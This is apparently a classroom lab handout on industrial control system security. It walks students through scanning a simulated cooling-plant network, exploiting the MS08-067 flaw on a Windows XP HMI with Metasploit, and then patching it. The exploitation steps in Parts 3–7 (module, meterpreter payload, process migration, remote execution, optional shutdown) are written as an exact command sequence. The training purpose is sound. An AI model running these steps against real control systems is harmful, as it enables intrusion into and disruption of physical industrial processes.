Lab 1

Scenario Overview

The industrial control system (ICS) used in this scenario simulates an environment that might be used to cool industrial equipment. The ICS is made up of five systems. The first system contains a tank, tank level sensor and a water pump. The second system is a programmable logic controller (PLC) which controls the water pump based on the level of water found in the attached tank. The third system is an Open Platform Communications (OPC) server which accesses and modifies data found on the PLC. The fourth system is running Human Machine Interface (HMI) software which communicates with the OPC server to provide a human system operator with system statistics and control. The final system in the ICS is a security appliance that provides routing and firewall services for all systems. This scenario also make use of a system running Kali Linux. In this lab the virtual network switch is configured so that the Kail system receives all data transmitted. (Network diagram)

In this lab students will use Metasploit to create a network map, confirm a system vulnerability then use that vulnerability to exploit a system. While doing this, students will learn to perform basic module and payload searches in Metasploit and how to use the built-in help functionality. Students will also learn how configure and use a database to store Metasploit data.

Part 1
Install Systems

In this part of the lab you are going to install and configure the systems needed to complete the lab.

  1. If necessary, install the free Oracle VirtualBox Manager software on your system.
  2. Download, and if necessary extract, the lab image ICS-VirtualBox.ova.
  3. Start the Oracle VM VirtualBox program.
  4. Import the ICS-VirtualBox.ova lab image.
  5. After the import has completed access the Settings for the Security Appliance virtual machine and change its configuration so that it is bridged to the network device in your host computer.
  6. Power on the systems in the following order:

Part 2
Configure the Database Connection and Start Metasploit

In this part of the lab you are going to configure a database server, configure Metasploit to connect to the database then start Metasploit using the msfconsole command.

  1. Access the Kali system.
  2. At the login screen enter student into the Enter your username field and Password01 into the Enter your password field.
  3. Click the Log In button.
  4. Open a terminal (command prompt) window by clicking the Terminal Emulator button found at the upper left hand corner of the window (Example).
  5. Type the command sudo systemctl enable --now postgresql to start the PostgreSQL database and configure it to start automatically if the system is restarted.
  6. Type the command sudo msfdb init to perform one time configuration changes which initialize the database and configure it to connect with Metasploit.
  7. Type the command sudo msfconsole to start Metasploit.
  8. After Metasploit starts, type the command db_status to verify the database to Metasploit connection.
  9. Type the command workspace -a metasploit_lab to create a database connection to store the activities of this lab.

Part 3
Map the Network and Find a Vulnerability

In this part of the lab you will use the nmap functionality built into Metasploit to map the network and find a system vulnerability.

  1. Type the command db_nmap -O 10.0.255.0/24 to create a network map showing hosts and the operating system they are running.
  2. After the scan has completed, type the command hosts to view the results of the network map then note that several systems are running the operating system Windows XP (Example).
  3. Take a screen shot that shows the entire Kali window ( Example ) and paste it into the Lab Form found here.
  4. Take a minute or two to do some quick web research on the windows xp netapi vulnerability.
  5. Verify that at least one of the discovered Windows XP systems is vulnerable to the ms08-067 vulnerability by typing the command db_nmap -Pn --script smb-vuln-ms08-067.nse 10.0.255.101 (Example).

Part 4
Find, Load and Configure a Module

In this part of the lab you will find a module targeting the vulnerability found in the last section then load and configure the module.

  1. Determine if Metasploit contains an exploit for the netapi vulnerability by typing the command search ms08-067.
  2. Load the exploit module by typing the command use exploit/windows/smb/ms08_067_netapi.
  3. Type the command show options to view the options available to the module.
  4. Set the IP address of the target (remote) host by typing the command set RHOSTS 10.0.255.101.

Part 5
Find, Load and Configure a Payload

In this part of the lab you will find a payload that can be used to exploit the target system, then you will load and configure that payload.

  1. Type the command show payloads to view the payloads that may work with the module.
  2. Set the payload which will establish a meterpreter TCP connection to the remote system with the command set payload windows/meterpreter/bind_tcp.
  3. Type the command show options to view the options available to the payload.

Part 6
Exploit the Target

In this section of the lab you will run the exploit then practice working in the target environment.

  1. Type the command exploit to run the module.
  2. Type the command help to view the available meterpreter commands.
  3. Type the command getuid to determine what your current user name is.
  4. Record the username in the Lab Form found here.
  5. Type the command help ps to view help details regarding the ps command.
  6. Type the command ps -U student to view all programs that are running as the student user (Example).
  7. Note the PID number of the AdvancedHMI.exe process that is running as the student user (Example).
  8. Type the command help migrate to view help details regarding the migrate command.
  9. Type the command migrate the_pid_of_the_AdvancedHMI.exe process (Example).
  10. Type the command getuid to determine what your current user name is.
  11. Record the username shown in the Lab Form found here.
  12. Type the command help execute to view help details regarding the execute command.
  13. Type the command execute -f sol.exe to execute the program sol.exe on the remote system.
  14. Access the HMI system and note the effects of the exploit in the Lab Form found here.

Part 7
(Challenge/Optional) Shutdown the Target System

In this optional section of the lab you are going to shutdown the target system.

  1. Access the Kali system.
  2. Use Metasploit to shutdown the target system.
  3. Record the command(s) you used to shutdown the target system in the Lab Form found here.

Part 8
Eliminate the Vulnerability

In this section of the lab you will patch the Windows system to eliminate the vulnerability then use Metasploit to verify the vulnerability no longer exists.

  1. Type exit to close the Metasploit session on the Kali system.
  2. Access the HMI system.
  3. Reboot the HMI system to clear the effects of the Metasploit session.
  4. After the HMI system had rebooted, start the patch process by double clicking on the windowsxp-ms08-067.exe file found on the Windows XP desktop (Example).
  5. Click Next when the Software Update Installation Wizard screen appears.
  6. Select the I Agree option on the License Agreement page then click the Next button.
  7. After the installation has completed click the Finish button.
  8. Wait for the HMI system to reboot then access the Kali system.
  9. Type the command sudo msfconsole to start Metasploit.
  10. Type the command workspace metasploit_lab to restore the previously created metasploit_lab workspace's settings.
  11. Type the command db_nmap -Pn --script smb-vuln-ms08-067.nse 10.0.255.101 to determine if the HMI system is still vulnerable to the ms08-067 vulnerability.
  12. Take a screen shot that shows the entire Kali window ( Example ) and paste it into the Lab Form found here.
  13. To end the lab, power off the virtual machines.